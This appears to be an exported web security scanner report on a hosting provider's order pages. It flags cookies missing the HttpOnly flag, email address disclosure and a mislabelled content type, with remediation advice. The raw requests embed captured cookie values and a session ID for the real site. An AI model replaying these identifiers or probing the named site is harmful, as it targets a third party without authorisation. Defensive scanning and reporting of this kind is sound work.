The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7e68c4801468a800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupGreenPower HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupGreenPower;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7a09ad3484127800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupPayPalInfo HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=226ab840267c5c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupServerOsCds HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1c33f57f30826000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupServerOsVps HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupTcGoogleAdwords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3b642682d7bbd000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupTcGoogleAdwords HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=7feacfa62b8fb000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/popupWebsiteMagazine HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=59c0d039ad1bdc00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/sitedesign HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=8853c31122ce000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/tariffselect HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The response contains the following Content-type statement:
Content-Type: text/plain;charset=utf-8
The response states that it contains plain text. However, it actually appears to contain JSON.
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.